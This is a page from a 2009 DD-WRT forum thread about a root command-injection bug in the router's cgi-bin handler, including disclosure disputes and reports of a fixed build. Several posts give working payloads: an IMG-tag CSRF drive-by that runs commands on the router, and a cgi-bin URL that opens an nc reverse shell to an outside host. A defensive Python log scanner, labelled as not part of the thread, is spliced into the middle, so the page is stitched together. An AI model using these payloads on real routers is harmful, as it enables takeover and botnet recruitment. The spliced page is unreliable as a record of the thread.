DD-WRT Root exploit posted today

jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 16:35    Post subject: Reply with quote
OB1 wrote:


saw it, but it's totally WRONG, tried it by myself, with WAN httpd disabled and it WORKS, I suspect Eko didn't fully understand the issue; also, it would be a good idea to post an alert on the site front page urging users to update to the latest firmware before someone starts using DD-WRT boxes as bots

[edit]

If you want to try it by yourself do the following

setup a web page somewhere on the internet; on the
page add an IMG tag like the following one (add angular brackets as needed)

IMG SRC="http://192.168.1.1/cgi-bin/;init$IFS6"

or something like that; then using a vulnerable version of DD-WRT, and a machine sitting behind the DD-WRT router, open that page

the browser will see the IMG reference and attempt to fetch it, but the URL points to the LAN IP of the router, so the result will be triggering the exploit and executing the command; in the above case you'll be sending an "init 6" but you may use whatever other command you want, including "nc" or whatever else


A lot of confusion here about this bug.

As stated, there have been posts from the developers themselves as recent as today stating that this bug only affects the httpd when remote/WAN admin is enabled.

The original post in this thread clearly sums it up that this is not the case, and we have multiple people confirming that this bug does exist and that it can be triggered via CSRF drive-by.

I'm grateful for dd-wrt and all development, but with the time, effort, and attention put into it, how could they overlook this huge security hole, and now almost ignore it?
OB1
DD-WRT Novice


Joined: 22 Jul 2009
Posts: 25

PostPosted: Wed Jul 22, 2009 16:42    Post subject: Reply with quote
jrock wrote:
OB1 wrote:


saw it, but it's totally WRONG, tried it by myself, with WAN httpd disabled and it WORKS, I suspect Eko didn't fully understand the issue; also, it would be a good idea to post an alert on the site front page urging users to update to the latest firmware before someone starts using DD-WRT boxes as bots

[edit]

If you want to try it by yourself do the following

setup a web page somewhere on the internet; on the
page add an IMG tag like the following one (add angular brackets as needed)

IMG SRC="http://192.168.1.1/cgi-bin/;init$IFS6"

or something like that; then using a vulnerable version of DD-WRT, and a machine sitting behind the DD-WRT router, open that page

the browser will see the IMG reference and attempt to fetch it, but the URL points to the LAN IP of the router, so the result will be triggering the exploit and executing the command; in the above case you'll be sending an "init 6" but you may use whatever other command you want, including "nc" or whatever else


A lot of confusion here about this bug.

As stated, there have been posts from the developers themselves as recent as today stating that this bug only affects the httpd when remote/WAN admin is enabled.

The original post in this thread clearly sums it up that this is not the case, and we have multiple people confirming that this bug does exist and that it can be triggered via CSRF drive-by.

I'm grateful for dd-wrt and all development, but with the time, effort, and attention put into it, how could they overlook this huge security hole, and now almost ignore it?


Heh... something I'm wondering about as well :(

And btw there's another issue too: as m1lw0rm stated, the code parsing cgi-bin requests isn't properly sanitizing the input, and this may (didn't verify it) lead to some other nasty bug

SIGH

hope the developers will understand that this isn't a "minor issue" and will fix it and PROPERLY alert the users; at the moment, the alert on the site front page is wrong and may give users a wrong sense of security :( the exploit works even if the WEB GUI isn't enabled on WAN, so the only real way to fix it is to upgrade to the fixed firmware (hope it was really fixed) and/or change the WEB (httpd) admin port to something different
jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 16:58    Post subject: Reply with quote
I just noticed the alert on the home page. That's a good start to getting the word out on this.

Thank you pete & admins.

OB1 wrote:
the alert on the site front page is wrong and may give users a wrong sense of security


Even though they don't go into detail about the worst of the problem, at least they are acknowledging it and directing people to a fixed build.

I don't think we'll see a 'code-red' unless we see some actual reports of folks being hacked.
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Wed Jul 22, 2009 16:59    Post subject: Reply with quote
OB1 wrote:
Yes, m1lw0rm used the classic "kiddie protection" to avoid some lame folk using the exploit w/o understanding it, but aside from that, the exploit works, and it works without any need to have the web admin GUI opened on the WAN interface

I don't believe this is true but I may be mistaken. The report clearly lists 1) No metacharacters handling which indicates to me that the backslash is key to this particular example link. If you remove the backslash then netcat fails to run although other commands work fine without backslashes.

_________________
Read the forum announcements thoroughly! Be cautious if you're inexperienced.
Available for paid consulting. (Don't PM about complicated setups otherwise)
Looking for bricks and spare routers to expand my collection. (not interested in G spec models)
OB1
DD-WRT Novice


Joined: 22 Jul 2009
Posts: 25

PostPosted: Wed Jul 22, 2009 17:03    Post subject: Reply with quote
jrock wrote:
I just noticed the alert on the home page. That's a good start to getting the word out on this.

Thank you pete & admins.

OB1 wrote:
the alert on the site front page is wrong and may give users a wrong sense of security


Even though they don't go into detail about the worst of the problem, at least they are acknowledging it and directing people to a fixed build.

I don't think we'll see a 'code-red' unless we see some actual reports of folks being hacked.


I'm not suggesting to cry "the sky is falling", but telling the users that the vuln exists only if the WEB GUI is enabled on WAN is wrong and may lead to a false sense of security... someone may decide that he'll just need to disable WAN admin and feel secure while ... he isn't
OB1
DD-WRT Novice


Joined: 22 Jul 2009
Posts: 25

PostPosted: Wed Jul 22, 2009 17:04    Post subject: Reply with quote
phuzi0n wrote:
OB1 wrote:
Yes, m1lw0rm used the classic "kiddie protection" to avoid some lame folk using the exploit w/o understanding it, but aside from that, the exploit works, and it works without any need to have the web admin GUI opened on the WAN interface

I don't believe this is true but I may be mistaken. The report clearly lists 1) No metacharacters handling which indicates to me that the backslash is key to this particular example link. If you remove the backslash then netcat fails to run although other commands work fine without backslashes.


Hmmm.... maybe you're right, will have to play with that some more

[edit]

http://192.168.1.1/cgi-bin/;nc$IFS-e$IFS/bin/sh$IFS1.2.3.4$IFS\80

the above will run nc in reverse telnet mode, connect to the host at IP 1.2.3.4, port 80 and start a shell; the backslash is needed to avoid the misinterpretation of the port number, but it may be avoided by using a different syntax ;)


Last edited by OB1 on Wed Jul 22, 2009 17:08; edited 1 time in total
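As an added, defender-side example that is not from this thread or the DD-WRT project: a small Python scanner that parses web-server access-log lines and flags cgi-bin requests whose path carries shell metacharacters (the `;`, `$IFS` and backslash shapes quoted in the posts above), and marks a hit as cross-site when the Referer points at a page on a host other than the router, which is the drive-by pattern OB1 describes. The router address 192.168.1.1, the combined log format and every log line are constructed assumptions, not real traffic.

```python
"""Flag cgi-bin command-injection attempts and CSRF-style referers in access logs.

Added example; not DD-WRT code. The log lines are constructed to resemble the
request shapes discussed in the thread.
"""
import re
from urllib.parse import unquote

# Shell metacharacters that have no business inside a cgi-bin path segment.
# '$' catches the $IFS trick used as a space substitute, '\\' the backslash
# used to keep the port number from being misinterpreted.
SHELL_META = set(';|&`$\\<>(){}')

# Constructed combined-format log lines (assumption: the router logs like this).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jul/2009:16:35:01 +0000] "GET /cgi-bin/;init$IFS6 HTTP/1.1" 200 12 "http://evil.example/page.html" "Mozilla/5.0"
10.0.0.5 - - [22/Jul/2009:16:36:10 +0000] "GET /cgi-bin/;nc$IFS-e$IFS/bin/sh$IFS1.2.3.4$IFS\\80 HTTP/1.1" 200 0 "http://evil.example/page.html" "Mozilla/5.0"
10.0.0.7 - - [22/Jul/2009:16:37:22 +0000] "GET /Status_Router.asp HTTP/1.1" 200 5120 "http://192.168.1.1/index.asp" "Mozilla/5.0"
10.0.0.9 - - [22/Jul/2009:16:38:03 +0000] "GET /cgi-bin/%3Bls HTTP/1.1" 200 0 "-" "curl/7.19"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Split one combined-format line into fields; percent-decode the path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["path"])  # %3B -> ';' so encoding does not hide it
    return rec


def cgi_injection_findings(path):
    """Metacharacters found after /cgi-bin/, sorted; [] when the path is clean."""
    prefix = "/cgi-bin/"
    if not path.startswith(prefix):
        return []
    rest = path[len(prefix):]
    return sorted(ch for ch in set(rest) if ch in SHELL_META)


def is_cross_site(referer, router_hosts):
    """True when the referring page lives on a host other than the router."""
    if referer in ("", "-"):
        return False
    host = re.sub(r'^https?://', '', referer).split('/')[0]
    return host not in router_hosts


def scan_log(text, router_hosts=("192.168.1.1",)):
    """Return one alert dict per request that carries cgi-bin metacharacters."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        meta = cgi_injection_findings(rec["path"])
        if meta:
            alerts.append({
                "ip": rec["ip"],
                "path": rec["path"],
                "metachars": meta,
                "cross_site": is_cross_site(rec["referer"], router_hosts),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        tag = "CSRF-style referer" if alert["cross_site"] else "direct"
        print(f'{alert["ip"]} {alert["path"]} metachars={alert["metachars"]} ({tag})')
```

The scan decodes the path before inspecting it, so a percent-encoded `;` is caught as well as a literal one; the cross-site flag is only a hint, since a browser may send no Referer at all, which is why the metacharacter check, not the referer, decides whether a line is reported.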
wjwj
DD-WRT User


Joined: 20 Sep 2008
Posts: 125

PostPosted: Wed Jul 22, 2009 17:07    Post subject: Reply with quote
Super-fast reaction!!! Thumbs up!
_________________
1 x TP-Link WDR-4300 v1.1 (primary router running OpenWRT Attitude Adjustment)
1 x TP-Link WDR-3600 v1.4 (backup/testing router running latest OpenWRT bleeding edge)
jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 17:16    Post subject: Reply with quote
OB1 wrote:

I'm not suggesting to cry "the sky is falling", but telling the users that the vuln exists only if the WEB GUI is enabled on WAN is wrong and may lead to a false sense of security... someone may decide that he'll just need to disable WAN admin and feel secure while ... he isn't


I'm not disagreeing with you.

It seems that either the developers are misinformed or in denial, perhaps along with us.

I think there should be full disclosure of what the problem is from the developers so people are informed. We have people verifying this bug independently, and others saying that it won't work via drive-by because of ONE character mismatch. Then we have the developers that are denying the bug exists altogether when remote management is disabled.

Confusing mess.
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Wed Jul 22, 2009 17:22    Post subject: Reply with quote
The fix in build 12548 seems to work correctly.
_________________
Read the forum announcements thoroughly! Be cautious if you're inexperienced.
Available for paid consulting. (Don't PM about complicated setups otherwise)
Looking for bricks and spare routers to expand my collection. (not interested in G spec models)
Murrkf
DD-WRT Guru


Joined: 22 Sep 2008
Posts: 12675

PostPosted: Wed Jul 22, 2009 17:24    Post subject: Reply with quote
OB1 wrote:
I'm not suggesting to cry "the sky is falling", but telling the users that the vuln exists only if the WEB GUI is enabled on WAN is wrong and may lead to a false sense of security... someone may decide that he'll just need to disable WAN admin and feel secure while ... he isn't


This actually might be a reference to a previous exploit, a couple of months ago.

_________________
SIG:
I'm trying to teach you to fish, not give you a fish. If you just want a fish, wait for a fisherman who hands them out. I'm more of a fishing instructor.
LOM: "If you show that you have not bothered to read the forum announcements or to follow the advices in them then the level of help available for you will drop substantially, also known as Murrkf's law.."


Last edited by Murrkf on Wed Jul 22, 2009 17:25; edited 1 time in total
hanswuascht
DD-WRT Novice


Joined: 28 Jun 2008
Posts: 11

PostPosted: Wed Jul 22, 2009 17:24    Post subject: Reply with quote
Just for the record: this affects all SVN builds until now as well, right?

I'm happily running DD-WRT v24-sp2 (12/17/08) std (SVN revision 11218M NEWD Eko) but it seems I need to replace it?
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Wed Jul 22, 2009 17:28    Post subject: Reply with quote
jrock wrote:
I think there should be full disclosure of what the problem is from the developers so people are informed. We have people verifying this bug independently, and others saying that it won't work via drive-by because of ONE character mismatch. Then we have the developers that are denying the bug exists altogether when remote management is disabled.

To be precise, only the example link doesn't work in a SIMPLE drive-by. Commands without backslashes work easily in img sources, and commands that need the backslash could probably be run through JavaScript or Flash.

_________________
Read the forum announcements thoroughly! Be cautious if you're inexperienced.
Available for paid consulting. (Don't PM about complicated setups otherwise)
Looking for bricks and spare routers to expand my collection. (not interested in G spec models)
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Wed Jul 22, 2009 17:40    Post subject: Reply with quote
phuzi0n wrote:
The fix in build 12548 seems to work correctly.


Thanks for testing and verification.

I said mini code red as in perhaps a large botnet, not the sky is falling... simply a dangerous exploit. Not @ you phuzi0n.
jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 17:42    Post subject: Reply with quote
phuzi0n wrote:
To be precise, only the example link doesn't work in a SIMPLE drive-by. Commands without backslashes work easily in img sources, and commands that need the backslash could probably be run through JavaScript or Flash.


Thank you for clarifying that; I should have read the posts more closely.
johannes
DD-WRT Novice


Joined: 24 May 2009
Posts: 16

PostPosted: Wed Jul 22, 2009 17:48    Post subject: Is sp2 affected or not? Reply with quote
I did not really understand what the situation with SP2 is. I am currently running DD-WRT v24-sp2 (06/02/09) vpn (SVN revision 12250M NEWD Eko).

Does that need an upgrade? Is sp2 affected until a certain revision or generally unaffected? Or are all versions until today affected?
Page 6 of 15. All times are GMT.